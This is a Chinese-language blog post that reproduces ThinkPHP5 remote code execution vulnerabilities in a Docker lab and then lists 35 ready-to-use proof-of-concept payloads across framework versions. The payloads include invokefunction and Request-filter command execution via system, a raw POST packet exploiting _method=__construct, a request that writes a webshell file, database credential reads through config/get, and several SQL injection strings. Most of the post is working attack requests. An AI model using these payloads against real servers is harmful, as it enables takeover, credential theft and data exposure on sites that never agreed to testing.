ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现
ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。
实验环境
靶机:ThinkPHP5 5.0.20
攻击机:kali
复现:
1.docker搭建好环境
2.直接访问`http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1`,即可执行phpinfo:
简单,快捷 ^ ^
3.写入一句话木马 #PHP7.1以上assert函数用不了!
ThinkPHP5 5.0.23 远程代码执行漏洞
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
实验环境
靶机:ThinkPHP5 5.0.23
攻击机:kali
复现:
发送构造好的数据包即可
```
POST /index.php?s=captcha HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id
```
----------------------------------------------------------------------------------------------------------------------------------------------------------------
其他一些版本的
POC:
thinkphp 5.0.22
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username 2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password 3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id 4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
thinkphp 5
5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
thinkphp 5.0.21
6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id 7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
thinkphp 5.1.*
8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1 9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd 10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E 11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E 12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd 14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
未知版本
16、?s=index/\think\module/action/param1/${@phpinfo()} 17、?s=index/\think\Module/Action/Param/${@phpinfo()} 18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)} 19、index.php?s=/home/article/view_recent/name/1' header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#" 20、index.php?s=/home/shopcart/getPricetotal/tag/1%27 21、index.php?s=/home/shopcart/getpriceNum/id/1%27 22、index.php?s=/home/user/cut/id/1%27 23、index.php?s=/home/service/index/id/1%27 24、index.php?s=/home/pay/chongzhi/orderid/1%27 25、index.php?s=/home/pay/index/orderid/1%27 26、index.php?s=/home/order/complete/id/1%27 27、index.php?s=/home/order/complete/id/1%27 28、index.php?s=/home/order/detail/id/1%27 29、index.php?s=/home/order/cancel/id/1%27 30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+ 31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1 Content-Disposition: form-data; name="couponid" 1') union select sleep('''+str(sleep_time)+''')#
thinkphp 5.0.23(完整版)debug模式
32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx
thinkphp 5.0.23(完整版)
33、(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
thinkphp 5.0.10(完整版)
34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system
thinkphp 5.1.* 和 5.2.* 和 5.0.*
35、(post)public/index.php (data)c=exec&f=calc.exe&_method=filter
来自WebShell'S Blog,本文地址:https://www.webshell.cc/7369.html